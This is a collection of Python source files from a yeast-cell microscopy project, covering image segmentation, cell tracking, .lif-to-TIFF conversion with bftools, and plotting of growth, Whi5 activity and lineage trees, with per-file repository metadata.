"avg_line_length": 24,
"blob_id": "2e4d2f77102ebb233a55ab6a6a1160f93a83a1ac",
"content_id": "0b08cbf6501b080a60f103ba1a766557950369ce",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 325,
"license_type": "no_license",
"max_line_length": 49,
"num_lines": 13,
"path": "/UserInterface/LoadData/getCropCoordinates.py",
"repo_name": "Klas96/YeastTrack",
"src_encoding": "UTF-8",
"text": "posList = []\n\ndef onMouse(event, x, y, flags, param):\n global posList\n if event == cv2.EVENT_LBUTTONDOWN:\n posList.append((x, y))\n\ndef getCropCoordinates(mats):\n #Get last image\n #Import Image Crop\n cv2.imshow(\"SelectCropPos\",mats[-2])\n cv2.setMouseCallback(\"SelectCropPos\",onMouse)\n print(posList)\n"
},
{
"alpha_fraction": 0.7227332592010498,
"alphanum_fraction": 0.7389400005340576,
"avg_line_length": 33.07462692260742,
"blob_id": "4d2b22554aa6518b2ee2e475e1b09b512847cf34",
"content_id": "75dfd2c97f4422c9f9964fee1aee4886445dc2fe",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2283,
"license_type": "no_license",
"max_line_length": 99,
"num_lines": 67,
"path": "/Segmentation/OstuBinarizartion.py",
"repo_name": "Klas96/YeastTrack",
"src_encoding": "UTF-8",
"text": "import cv2\nimport numpy as np\nfrom Segmentation.cellInstance import cellInstance\nfrom Segmentation.getWHI5Activity import getWHI5Activity\nfrom Segmentation.FilterDetection import filterDetections\nfrom Segmentation.getThreshold import getTherholdImage\nfrom Segmentation.Rescaling import rescaleImage\nfrom Segmentation.ConvexHull import convexHull\n\n\n#OstuBinarization\n#Pre: Frame As defined in main\n#Ret: CellInstances in\ndef OtsuBinarization(frame):\n optImg = frame.getOptImage()\n floImg = frame.getFloImage()\n optImg = rescaleImage(optImg,10)\n #floImg = rescaleImage(floImg,10)\n maskImg = getMaskFrame(optImg)\n maskImg = rescaleImage(maskImg,0.1)\n cellInstanses = conectedCompontents(maskImg,floImg)\n cellInstanses = filterDetections(cellInstanses)\n return(cellInstanses)\n\n#Pre: VideoFrame\n#Ret: White on black maskFrame\ndef getMaskFrame(img):\n img = otsuThreshold(img)\n maskImg = convexHull(img)\n return(maskImg)\n\n\"\"\"\n#Pre: takes An binary image\n#Ret: Returns Image with conexHull filled of all wite separated images\ndef convexHull(img):\n # Finding contours for the thresholded image\n contours, hierarchy = cv2.findContours(img, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)\n #im2, contours, hierarchy = cv2.findContours(frame, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)\n # create hull array for convex hull points\n hull = []\n # calculate points for each contour\n for i in range(len(contours)):\n # creating convex hull object for each contour\n hull.append(cv2.convexHull(contours[i], False))\n\n #Create an empty black image\n img = np.zeros((img.shape[0], img.shape[1]), np.uint8)\n\n for i in range(len(contours)):\n img = cv2.fillPoly(img, pts =[hull[i]], color=(255))\n\n return(img)\n\"\"\"\n\ndef conectedCompontents(img,floFrame):\n conectedCompontents, hirearchy = cv2.findContours(img, cv2.RETR_CCOMP, cv2.CHAIN_APPROX_SIMPLE)\n cellInstanses = []\n for cnt in conectedCompontents:\n whi5Activ = getWHI5Activity(cnt,floFrame)\n cellInstans = cellInstance(cnt,whi5Activ)\n cellInstanses.append(cellInstans)\n return(cellInstanses)\n\ndef otsuThreshold(img):\n #apply thresholding\n gotFrame, thresh = cv2.threshold(img,0,255,cv2.THRESH_BINARY+cv2.THRESH_OTSU)\n return(thresh)\n"
},
{
"alpha_fraction": 0.6689189076423645,
"alphanum_fraction": 0.6869369149208069,
"avg_line_length": 23.66666603088379,
"blob_id": "098d21b2bf410a19cad3ae801183e0fb5da134b9",
"content_id": "e65f2cdeb715d052fc089801d7049a69fca64d07",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 444,
"license_type": "no_license",
"max_line_length": 72,
"num_lines": 18,
"path": "/UserInterface/IncreasIntesity.py",
"repo_name": "Klas96/YeastTrack",
"src_encoding": "UTF-8",
"text": "import numpy as np\nimport cv2\n#Pre: frame\n#ret: Frame with higer intesity\ndef incFloIntens(img,intens):\n intens = int(intens/10)\n #Check number of colors\n numCol = 3\n\n intensImg = np.zeros((img.shape[0], img.shape[1], numCol), np.uint8)\n for i in range(intens):\n intensImg = cv2.add(intensImg,img)\n return(intensImg)\n\n#Merge\ndef increasIntens(img,currentBlend):\n img = incFloIntens(img,currentBlend)\n return(img)\n"
},
{
"alpha_fraction": 0.6570605039596558,
"alphanum_fraction": 0.6743515729904175,
"avg_line_length": 23.785715103149414,
"blob_id": "1166a1fc96de9f14f672c5b464562b9b948ce65a",
"content_id": "b8cab3ece8f2d1dff837a7ef0fb31b6eb516ab54",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 347,
"license_type": "no_license",
"max_line_length": 45,
"num_lines": 14,
"path": "/Segmentation/FilterDetection.py",
"repo_name": "Klas96/YeastTrack",
"src_encoding": "UTF-8",
"text": "import cv2\nimport numpy as np\n\n#Pre: detections\n#Ret: Filtered Detections\ndef filterDetections(cellInstances):\n maxSize = 210\n minSize = 15\n filterdList = []\n for cellInst in cellInstances:\n size = cellInst.getSize()\n if size < maxSize and size > minSize:\n filterdList.append(cellInst)\n return(filterdList)\n"
},
{
"alpha_fraction": 0.7105492353439331,
"alphanum_fraction": 0.7291485071182251,
"avg_line_length": 30.56880760192871,
"blob_id": "58ee9342ef5ac1442fadb6d2ecc545df256f39ee",
"content_id": "6d7d95847c74598f0965f6e7934b0a1830a49588",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3441,
"license_type": "no_license",
"max_line_length": 102,
"num_lines": 109,
"path": "/Segmentation/ThersholdingSegmentation.py",
"repo_name": "Klas96/YeastTrack",
"src_encoding": "UTF-8",
"text": "from Segmentation.Preprocessing import preprocess\nfrom Segmentation.Preprocessing import preprocessFloImg\nimport cv2\nfrom matplotlib import pyplot as plt\nimport numpy as np\nfrom Segmentation.cellInstance import cellInstance\nfrom Segmentation.getWHI5Activity import getWHI5Activity\nfrom Segmentation.FilterDetection import filterDetections\nfrom Segmentation.ConvexHull import convexHull\nfrom Segmentation.ConectedComponents import conectedCompontents\n#Pre: Frame\n#Ret: CellInstances\ndef segementThreshold(frame):\n #Get Image\n optImg = frame.getOptImage()\n floImg = frame.getFloImage()\n #Apply Preprocessing\n optImg = preprocess(optImg)\n floImg = preprocessFloImg(floImg)\n #Segment Edges with thresholding\n binImg = thesholdEdges(optImg)\n #Erode Here To avoid conecting cells??\n\n\n #cv2.imshow(\"binimgEdges\",binImg)\n\n binImg = convexHull(binImg)\n\n #Threshold floImg\n binImgFlo = thesholdFlorecense(floImg)\n\n #grayThr = thresholdGray(optImg)\n\n #Intersection of Thresholds\n binImg = cv2.bitwise_and(binImg, binImgFlo)\n\n #cv2.imshow(\"binimgFinal\",binImg)\n #cv2.waitKey(0)\n cellInstanses= conectedCompontents(binImg,floImg)\n cellInstanses = filterDetections(cellInstanses)\n return(cellInstanses)\n\n#Pre: image of cells with clear edges\n#Ret: Binary image Edges White not edge black\ndef thesholdEdges(img):\n #Threshold values\n thrLow = 85\n thrHigh = 255\n #cv2.imshow(\"img\",img)\n gotImg, thresh = cv2.threshold(img,thrLow,thrHigh,cv2.THRESH_BINARY)\n return(thresh)\n\ndef thresholdGray(img):\n #Threshold\n thrLow = 65\n thrHigh = 255\n gotImg, thresh = cv2.threshold(img,thrLow,thrHigh,cv2.THRESH_BINARY)\n kernel = np.ones((2,2), np.uint8)\n thresh = cv2.erode(thresh, kernel, iterations=1)\n cv2.imshow(\"img\",thresh)\n cv2.waitKey(0)\n\n #Remove Largest\n #Find largest contour in intermediate image\n cnts, _ = cv2.findContours(thresh, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_NONE)\n cnt = max(cnts, key=cv2.contourArea)\n #Fill largest with Black\n cv2.drawContours(thresh, [cnt], -1, 0, cv2.FILLED)\n\n return(thresh)\n\ndef thesholdFlorecense(img):\n #Threshold values\n thrLow = 20\n thrHigh = 255\n #cv2.imshow(\"img\",img)\n gotImg, thresh = cv2.threshold(img,thrLow,thrHigh,cv2.THRESH_BINARY)\n return(thresh)\n\n#Pre: Binary Image\n#Ret: Binary img with convex hull\ndef cellInstasConvexHull(img,floImg):\n # Finding contours for the thresholded image\n contours, hierarchy = cv2.findContours(img, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)\n #im2, contours, hierarchy = cv2.findContours(frame, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)\n # create hull array for convex hull points\n\n cellInstanses = []\n # calculate points for each contour\n for i in range(len(contours)):\n # creating convex hull object for each contour\n hull = (cv2.convexHull(contours[i], False))\n whi5Activ = getWHI5Activity(hull,floImg)\n cellInstans = cellInstance(hull,whi5Activ)\n cellInstanses.append(cellInstans)\n\n return(cellInstanses)\n\n\ndef conectedCompontents(binImg,floImg):\n\n conectedCompontents, hirearchy = cv2.findContours(binImg, cv2.RETR_CCOMP, cv2.CHAIN_APPROX_SIMPLE)\n cellInstanses = []\n for cnt in conectedCompontents:\n whi5Activ = getWHI5Activity(cnt,floImg)\n cellInstans = cellInstance(cnt,whi5Activ)\n cellInstanses.append(cellInstans)\n\n return(cellInstanses)\n"
},
{
"alpha_fraction": 0.7032755017280579,
"alphanum_fraction": 0.7649325728416443,
"avg_line_length": 33.599998474121094,
"blob_id": "94d918fa7e32f4fd7030c5a55fb88d8f761edd99",
"content_id": "63861e7b7ec73e714cabb27841914b400e811c0e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 519,
"license_type": "no_license",
"max_line_length": 55,
"num_lines": 15,
"path": "/UserInterface/LoadData/ImportThreeZoomLevel.py",
"repo_name": "Klas96/YeastTrack",
"src_encoding": "UTF-8",
"text": "from UserInterface.videoClass import Video\nimport cv2\n\ndef loadThreeZoomLevel():\n zom0Path = \"VideoData/tileScan2/tileScan2OptZ0.avi\"\n zom1Path = \"VideoData/tileScan2/tileScan2OptZ1.avi\"\n zom2Path = \"VideoData/tileScan2/tileScan2OptZ2.avi\"\n flo1Path = \"VideoData/tileScan2/tileScan2Flo.avi\"\n\n zom0Cap = cv2.VideoCapture(zom0Path)\n zom1Cap = cv2.VideoCapture(zom1Path)\n zom2Cap = cv2.VideoCapture(zom2Path)\n flo1Cap = cv2.VideoCapture(flo1Path)\n\n return Video(zom0Cap,zom1Cap,zom2Cap,flo1Cap)\n"
},
{
"alpha_fraction": 0.6873469352722168,
"alphanum_fraction": 0.7248979806900024,
"avg_line_length": 33.02777862548828,
"blob_id": "89a84f1cdeed0b1dd266052e547c02b97a80691d",
"content_id": "7fb03040f9ca49b80caefa77c502eceac66b342f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1225,
"license_type": "no_license",
"max_line_length": 65,
"num_lines": 36,
"path": "/Segmentation/LaplacianGausian.py",
"repo_name": "Klas96/YeastTrack",
"src_encoding": "UTF-8",
"text": "import cv2\nfrom Segmentation.cellInstance import cellInstance\nimport numpy as np\nfrom Segmentation.getWHI5Activity import getWHI5Activity\nfrom Segmentation.FilterDetection import filterDetections\n#from frameClass import rescale_frame\n\n#LAP MEthoth for segmentation of yeast cells.\ndef laplacianGausian(frame):\n optFrame = frame.getOptChan()\n floFrame = frame.getFloChan()\n kernelSize = 3;\n scale = 1;\n delta = 0;\n ddepth = cv2.CV_16S;\n gaussian = cv2.GaussianBlur(optFrame, (3, 3), 0)\n gaussianShow = rescale_frame(gaussian,1000)\n cv2.imshow(\"gaussian\", gaussianShow)\n cv2.waitKey(0)\n #cv2.imwrite(\"gaussian\", gaussianShow)\n gaussian = cv2.cvtColor(gaussian, cv2.COLOR_BGR2GRAY)\n laplacian = cv2.Laplacian(gaussian, ddepth, ksize=kernelSize)\n laplacian = cv2.convertScaleAbs(laplacian)\n laplacianShow = rescale_frame(laplacian,1000)\n cv2.imshow(\"Laplacian\", laplacianShow)\n cv2.waitKey(0)\n #cv2.imwrite(\"Laplacian\", laplacianShow)\n\n return([])\n\n\ndef rescale_frame(frame, percent=75):\n width = int(frame.shape[1] * percent/100)\n height = int(frame.shape[0] * percent/100)\n dim = (width, height)\n return cv2.resize(frame, dim, interpolation =cv2.INTER_AREA)\n"
},
{
"alpha_fraction": 0.6062802076339722,
"alphanum_fraction": 0.6239935755729675,
"avg_line_length": 26.600000381469727,
"blob_id": "ad032f499575e8531713c63037932839654fc2cd",
"content_id": "186d850f58bb607113b6f50240260eafa46cdf66",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1242,
"license_type": "no_license",
"max_line_length": 43,
"num_lines": 45,
"path": "/UserInterface/LoadData/LoadtifFile.py",
"repo_name": "Klas96/YeastTrack",
"src_encoding": "UTF-8",
"text": "from UserInterface.videoClass import Video\nimport cv2\n\ndef imortTiftoVideo(filePath):\n numChan = 2\n numZoomLevles = 4\n etval, mats = cv2.imreadmulti(filePath)\n #8 images for each frame\n #TODO Generalize\n allFrames = []\n for matIndex in range(0,len(mats),8):\n frame = []\n optChan = []\n #optChan.append(mats[matIndex])\n #optChan.append(mats[matIndex+1])\n #optChan.append(mats[matIndex+2])\n optChan.append(mats[matIndex+3])\n floChan = []\n #floChan.append(mats[matIndex+4])\n floChan.append(mats[matIndex+5])\n #floChan.append(mats[matIndex+6])\n #floChan.append(mats[matIndex+7])\n frame.append(optChan)\n frame.append(floChan)\n allFrames.append(frame)\n video = Video(allFrames)\n del mats\n return(video)\n\ndef imortTiftoVideoNew(filePath):\n numChan = 2\n numZoomLevles = 4\n etval, mats = cv2.imreadmulti(filePath)\n #8 images for each frame\n #TODO Generalize\n allFrames = []\n for matIndex in range(0,len(mats)-1,2):\n frame = []\n frame.append(mats[matIndex])\n frame.append(mats[matIndex+1])\n allFrames.append(frame)\n\n video = Video(allFrames)\n del mats\n return(video)\n"
},
{
"alpha_fraction": 0.607120931148529,
"alphanum_fraction": 0.6193984150886536,
"avg_line_length": 28.089284896850586,
"blob_id": "caba8404d3674414da63d38e8ec8ff4008e4eb82",
"content_id": "89a159e7e2f935036827b4dea4f0ab3626bd8b96",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1629,
"license_type": "no_license",
"max_line_length": 87,
"num_lines": 56,
"path": "/UserInterface/LoadData/ConvertLiftoTif.py",
"repo_name": "Klas96/YeastTrack",
"src_encoding": "UTF-8",
"text": "import os\n\ndef convertLifToTif(inPath, OutPath):\n cleanWorking = \"rm ./VideoData/WorkingData/*\"\n os.system(cleanWorking)\n\n series = 3\n channel = 1\n zoomLevel = 3\n filePath = inPath\n #Cropping Coordinates\n ulx,uly = (0,0)\n drx,dry = (512,512)\n\n #Convering -lif file with bioformats\n #Using nolookup option\n comand = \"./bftools/bfconvert -nolookup\"\n seriesFlag = \" -series \" + str(series)\n channelFlag = \" -channel \" + str(channel)\n zoomFlag = \" -z \" + str(zoomLevel)\n cropFlag = \" -crop \"+str(ulx)+\",\"+str(uly)+\",\"+str(drx)+\",\"+str(dry)\n filePath = \" \" + filePath\n tifPath = \" \" + OutPath\n\n #cmd = comand + seriesFlag + cropFlag + channelFlag + zoomFlag + filePath + tifPath\n cmd = comand + seriesFlag + cropFlag + filePath + tifPath\n\n os.system(cmd)\n\n\ndef convertLifToTifNew(inPath, OutPath):\n cleanWorking = \"rm ./VideoData/WorkingData/*\"\n os.system(cleanWorking)\n\n series = 3\n channel = 1\n zoomLevel = 3\n filePath = inPath\n #Cropping Coordinates\n ulx,uly = (0,0)\n drx,dry = (10,10)\n\n #Convering -lif file with bioformats\n #Using nolookup option\n comand = \"./bftools/bfconvert -nolookup\"\n seriesFlag = \" -series \" + str(series)\n channelFlag = \" -channel \" + str(channel)\n zoomFlag = \" -z \" + str(zoomLevel)\n cropFlag = \" -crop \"+str(ulx)+\",\"+str(uly)+\",\"+str(drx)+\",\"+str(dry)\n filePath = \" \" + filePath\n tifPath = \" \" + OutPath\n\n #cmd = comand + seriesFlag + cropFlag + channelFlag + zoomFlag + filePath + tifPath\n cmd = comand + seriesFlag + cropFlag + zoomFlag + filePath + tifPath\n\n os.system(cmd)\n"
},
{
"alpha_fraction": 0.6400946974754333,
"alphanum_fraction": 0.6590371131896973,
"avg_line_length": 29.530120849609375,
"blob_id": "87f2ab0fdef2171552237892aecfc4550caa0849",
"content_id": "ef8b77bbd5139f56c0b724d12254519e5ccad0bc",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2534,
"license_type": "no_license",
"max_line_length": 123,
"num_lines": 83,
"path": "/UserInterface/LoadData/LoadData.py",
"repo_name": "Klas96/YeastTrack",
"src_encoding": "UTF-8",
"text": "import cv2\nimport numpy as np\nfrom matplotlib import pyplot as plt\nimport os\nfrom UserInterface.videoClass import Video\n#from Tkinter import Tk \n#from tkinter.filedialog import askopenfilename\n\n#Displays the OME-XML metadata for a file on the console:\n#showinf -omexml /path/to/file\n#showinf -nopix /path/to/file\n#os.popen('cat /etc/services').read()\n\ndef getVideo():\n filePath = getFilePath()\n\n series = choseSeries()\n\n cropUppLeft, cropDownRight = cropStage(filePath)\n\n #IF .lif file run\n convertLifToTif(lifFilePath, tifFilePath)\n video = imortTiftoVideo(tifFilePath)\n\n return(video)\n\ndef getFilePath():\n #Tk().withdraw()\n #filename = askopenfilename() # show an \"Open\" dialog box and return the path to the selected file\n #print(filename)\n path = \"/home/klas/Documents/Chalmers/ExamensArbete/YeastTrack/VideoData/Experiment13h_050619/Experiment13h_050619.lif\"\n return(path)\n\n#Gets Witch series should be loded by user\ndef choseSeries():\n print(\"What series would you like to load\")\n return(3)\n\n#Gets user to crop Video\ndef cropStage(filePath):\n uppLeft = (100,100)\n downRight = (200,200)\n return(uppLeft,downRight)\n\ndef loadData(filePath,series,cropUppLeft = -1, cropDownRight = -1):\n matList = []\n numZoomIn = 4\n numChan = 2\n #loading channel 0\n for channel in range(numChan):\n #List containg all zoom in levels\n zoomList = []\n for zoomLevel in range(numZoomIn):\n cleanWorking = \"rm ./YeastTrack/VideoData/WorkingData/*\"\n os.system(cleanWorking)\n\n comand = \"./bftools/bfconvert -nolookup\"\n seriesFlag = \" -series \" + str(series)\n channelFlag = \" -channel \" + str(channel)\n zoomFlag = \" -z \" + str(zoomLevel)\n cropFlag = \" -crop 0,0,512,512\"\n filePath = \" \" + filePath\n tifPath = \" ./YeastTrack/VideoData/WorkingData/working.tif\"\n\n cmd = comand + seriesFlag + cropFlag + channelFlag + zoomFlag + filePath + tifPath\n os.system(cmd)\n path = \"./YeastTrack/VideoData/WorkingData/working.tif\"\n retval, mats = cv2.imreadmulti(path)\n zoomList.append(mats)\n matList.append(zoomList)\n\n return(matList)\n\n\ndef skrap():\n path = \"/home/klas/Documents/Chalmers/ExamensArbete/YeastTrack/VideoData/WorkingData/working.tif\"\n\n retval, mats = cv2.imreadmulti(path)\n #retval, mats = cv2.imread(path)\n\n for i in range(len(mats)):\n cv2.imshow(\"Funka\",mats[i])\n cv2.waitKey()\n"
},
{
"alpha_fraction": 0.6512660980224609,
"alphanum_fraction": 0.6548200845718384,
"avg_line_length": 30.26388931274414,
"blob_id": "f7bda7d2de23041d7ce48d8b862ed88303ebda0f",
"content_id": "1a0b395f337ace48811458a8d1b289a31f65ff2c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2251,
"license_type": "no_license",
"max_line_length": 75,
"num_lines": 72,
"path": "/Analysis/VisulizeLinage.py",
"repo_name": "Klas96/YeastTrack",
"src_encoding": "UTF-8",
"text": "from matplotlib import pyplot as plt\nfrom scipy.cluster import hierarchy\nimport numpy as np\nimport networkx as nx\nfrom networkx.drawing.nx_agraph import graphviz_layout\nimport matplotlib.pyplot as plt\nfrom Anlysis.visulizeLinNetworkX import plotNxTree\n#import PyQt5\n#from ete3 import Tree\n#'from ete3 import TreeStyle\n# from igraph import *;\nfrom networkx.drawing.nx_agraph import graphviz_layout\n\n\n#def PlotLinageTree(trackedCells):\n#\n\n#Plots Linage tree\ndef PlotLinageTree(trackedCells):\n G = nx.DiGraph()\n #Add all Cells As Nodes\n for trCell in trackedCells:\n cellLabel = str(trCell.getCellID())#\"ID \" +\n G.add_node(cellLabel)\n\n #Add all edges\n for trCell in trackedCells:\n motherID = trCell.getMotherCell()\n if motherID == None:\n motherID = -1\n cellLabelM = str(motherID)#\"ID \" +\n cellLabelD = str(trCell.getCellID())#\"ID \" +\n relFactor = trCell.getRelatabelityFactor()\n G.add_edge(cellLabelM, cellLabelD, object=str(round(relFactor, 2)))\n\n btree = G#nx.balanced_tree(2,4)\n pos=graphviz_layout(G,prog='dot')\n nx.draw(G,pos,with_labels=True,arrows=True)\n #plotNxTree(G)\n #nx.draw_networkx(G, pos = nx.spring_layout(G))\n #nx.draw_networkx_edge_labels(G, pos = nx.spectral_layout(G))\n #plt.sxhow()\n #pos = nx.nx_pydot.graphviz_layout(g, prog='neato')\n #nx.draw(g, pos=layout)\n edge_labels = nx.get_edge_attributes(G, 'object')\n nx.draw_networkx_edge_labels(G, pos=pos, edge_labels=edge_labels)\n plt.show()\n\n\ndef PlotLinageTreeOLD(trackedCells):\n G = nx.DiGraph()\n\n G.add_node(\"ROOT\")\n\n for i in range(5):\n G.add_node(\"Child_%i\" % i)\n G.add_node(\"Grandchild_%i\" % i)\n G.add_node(\"Greatgrandchild_%i\" % i)\n\n G.add_edge(\"ROOT\", \"Child_%i\" % i)\n G.add_edge(\"Child_%i\" % i, \"Grandchild_%i\" % i)\n G.add_edge(\"Grandchild_%i\" % i, \"Greatgrandchild_%i\" % i)\n\n # write dot file to use with graphviz\n # run \"dot -Tpng test.dot >test.png\"\n nx.nx_agraph.write_dot(G,'test.dot')\n\n # same layout using matplotlib with no labels\n plt.title('draw_networkx')\n pos=graphviz_layout(G, prog='dot')\n nx.draw(G, pos, with_labels=False, arrows=False)\n plt.savefig('nx_test.png')\n"
},
{
"alpha_fraction": 0.7648902535438538,
"alphanum_fraction": 0.7680251002311707,
"avg_line_length": 44.57143020629883,
"blob_id": "96186f399f4eb8fb83082c4a98e8e7746a93b040",
"content_id": "f751da124198fcc2e5bdce4d6cbcbdc459dd9ef0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 319,
"license_type": "no_license",
"max_line_length": 61,
"num_lines": 7,
"path": "/Analysis/PlotTrackedCellsSize.py",
"repo_name": "Klas96/YeastTrack",
"src_encoding": "UTF-8",
"text": "from matplotlib import pyplot as plt\nfrom Anlysis.getDevisionFrameNum import getDevisionFrameNum\ndef plotTrackedCellsSize(trackedCells):\n for trCell in trackedCells:\n deviNum = getDevisionFrameNum(trCell)\n trace = trCell.getSizesTraceFromBegining()[0:deviNum]\n plt.plot(range(len(trace)),trace)\n"
},
{
"alpha_fraction": 0.6755824089050293,
"alphanum_fraction": 0.6833477020263672,
"avg_line_length": 32.59420394897461,
"blob_id": "bcf2735d0ef8272ba41dfb3d957dab4c13e96a79",
"content_id": "5cc7fd98e8b38206a9d23ad88c34816881f195fe",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2318,
"license_type": "no_license",
"max_line_length": 103,
"num_lines": 69,
"path": "/Analysis/plotFunctions.py",
"repo_name": "Klas96/YeastTrack",
"src_encoding": "UTF-8",
"text": "from matplotlib import pyplot as plt\nfrom Anlysis.plotSize import plotTrackCellSizeBudToMother\nfrom Anlysis.VisulizeLinage import PlotLinageTree\n\ndef plotFunction(trackedCells):\n cellToPlot = range(len(trackedCells))\n #plotTrackCellSizeBudToMother(cellToPlot, trackedCells)\n #PlotLinageTree(trackedCells)\n plotTrackCellWhi5(cellToPlot, trackedCells)\n\n#Pre1: ID number for cell\n#Pre2: List of tracked cells.\ndef plotSizeLineage(cellID,trackedCells):\n cellsInLinage = [cellID]\n for trackCell in trackedCells:\n if(trackCell.getMotherCell() == cellID):\n cellsInLinage.append(trackCell.getCellID())\n cellsInLinage = [0,6,13]\n plotTrackCellSize(cellsInLinage, trackedCells)\n plotTrackCellWhi5(cellsInLinage, trackedCells)\n\n\ndef plotTrackCellSize(cellToPlot, trackedCells):\n for trackedCell in trackedCells:\n cellID = trackedCell.getCellID()\n if any(cellID == i for i in cellToPlot):\n whi5Trace = trackedCell.getSizesTrace()\n dicovFrame = trackedCell.getDetectionFrameNum()\n plt.plot(range(dicovFrame, dicovFrame+len(whi5Trace)),whi5Trace, label=\"ID \" + str(cellID))\n\n plt.ylabel('Growth Curves')\n plt.xlabel('Time')\n plt.title(\"Size\")\n plt.xticks([])\n plt.yticks([])\n plt.legend()\n plt.show()\n\ndef plotTrackCellWhi5(cellToPlot, trackedCells):\n for trackedCell in trackedCells:\n cellID = trackedCell.getCellID()\n if any(cellID == i for i in cellToPlot):\n whi5Trace = trackedCell.getWhi5Trace()\n dicovFrame = trackedCell.getDetectionFrameNum()\n plt.plot(range(dicovFrame, dicovFrame+len(whi5Trace)),whi5Trace, label=\"ID \" + str(cellID))\n\n plt.ylabel('Whi5 Activity')\n plt.xlabel('Time')\n plt.title(\"Whi5 Activity\")\n plt.xticks([])\n plt.yticks([])\n plt.legend()\n plt.show()\n\n\ndef plotPositions(cellToPlot, trackedCells):\n for trackedCell in trackedCells:\n cellID = trackedCell.getCellID()\n if any(cellID == i for i in cellToPlot):\n xPosTrace,yPosTrace = trackedCell.getPosTrace()\n plt.plot(xPosTrace,yPosTrace)#, label=\"ID \" + str(cellID))\n\n plt.ylabel('y Position')\n plt.xlabel('x Position')\n plt.title(\"Position Trace\")\n plt.xticks([])\n plt.yticks([])\n plt.legend()\n plt.show()\n"
},
{
"alpha_fraction": 0.6150793433189392,
"alphanum_fraction": 0.6547619104385376,
"avg_line_length": 27,
"blob_id": "419dda9a46b0ff8778c264642dd736c6b7c040c1",
"content_id": "4d70c2e87a9117a50d14da81f90601bbc541bc2c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 252,
"license_type": "no_license",
"max_line_length": 43,
"num_lines": 9,
"path": "/Tracking/GetPositionFromContour.py",
"repo_name": "Klas96/YeastTrack",
"src_encoding": "UTF-8",
"text": "import cv2\n\ndef getPositionFromContour(contour):\n moments = cv2.moments(contour)\n #TOOD Byt till funktioner ist??\n cx = int(moments['m10']/moments['m00'])\n cy = int(moments['m01']/moments['m00'])\n position = (cx,cy)\n return(position)\n"
},
{
"alpha_fraction": 0.6580954790115356,
"alphanum_fraction": 0.6744843125343323,
"avg_line_length": 28.491666793823242,
"blob_id": "2dea47dc44e4dd6d132c6b4cdfc0e83061f5c526",
"content_id": "6c428ceaf3303eee89837722899a4e0031dcc877",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3539,
"license_type": "no_license",
"max_line_length": 87,
"num_lines": 120,
"path": "/UserInterface/frameClass.py",
"repo_name": "Klas96/YeastTrack",
"src_encoding": "UTF-8",
"text": "from Segmentation.cellInstance import cellInstance\nimport cv2\nimport numpy as np\nfrom Tracking.centroidTracker import CentroidTracker\nfrom Segmentation.OstuBinarizartion import OtsuBinarization\nfrom Segmentation.watershed import watershed\nfrom Segmentation.cellInstance import cellInstance\nfrom Segmentation.LaplacianGausian import laplacianGausian\nfrom Segmentation.ThersholdingSegmentation import segementThreshold\nfrom Segmentation.RandomForestSegmentaion import rfSegmentetion\nfrom UserInterface.getInstantSegmentImage import getCellInstImage\nfrom UserInterface.rescaleImageToUser import rescaleImageToUser\n\nclass Frame:\n #TODO three zoom Init???\n\n #variables\n #optImage\n #floImage\n #Constructor\n def __init__(self,optImage,floImage,frameNum=-1):\n #TODO load as gray images\n #variables\n self.optImg = optImage\n self.floImg = floImage\n self.frameNum = frameNum\n\n self.xSz = self.optImg.shape[0]\n self.ySz = self.optImg.shape[1]\n\n self.scaling = 1000\n #TODO MAke to factors of scaling\n\n #TODO\n self.pixelToMiccron = 1000\n\n self.classFrame = 0\n self.idFrame = 0\n self.analyseFrame()\n\n\n def addZoomLevels(self,zom0Img,zom1Img):\n self.optImgZom0 = zom0Img\n self.optImgZom1 = zom1Img\n\n #Methods\n #Getters\n def getOptImage(self):\n return(self.optImg)\n\n def getFloImage(self):\n return(self.floImg)\n\n def getZoom0Image(self):\n return(self.optImgZom0)\n\n def getZoom1Image(self):\n return(self.optImgZom1)\n\n def getFrameNum(self):\n return(self.frameNum)\n\n def getUserOptImage(self):\n #Make A Certain Size\n img = self.getOptImage()\n #make Empty image with size\n userImg = np.zeros(img.shape, np.uint8)\n #Merge two zeros and one grey\n userImg = cv2.merge([img,img,img])\n userImg = rescaleImageToUser(userImg)\n return(userImg)\n\n def getUserFloImage(self):\n #Make A Certain Size\n img = self.getFloImage()\n #make Empty image with size\n userImg = np.zeros(img.shape, np.uint8)\n #Merge two zeros and one grey\n userImg = cv2.merge([userImg,img,userImg])\n userImg = rescaleImageToUser(userImg)\n return(userImg)\n\n def getClassificationImage(self):\n return(self.classImg)\n\n #Ret: Image ilustrating whi5 Activation\n def getWHI5ActivImage(self):\n #Whi5Detect\n threshold = 0.30\n #CellDeteect\n #threshold = 0.175-0.0125\n #gray = cv2.cvtColor(self.getScaledfloImage(),cv2.COLOR_BGR2GRAY)\n gray = self.getUserFloImage()\n #apply thresholding\n gotFrame, thresh = cv2.threshold(gray,int(255*threshold),255,cv2.THRESH_BINARY)\n return(thresh)\n\n #ret: Gives Image\n def getCellInstancesImage(self):\n #self.cellInstanses\n 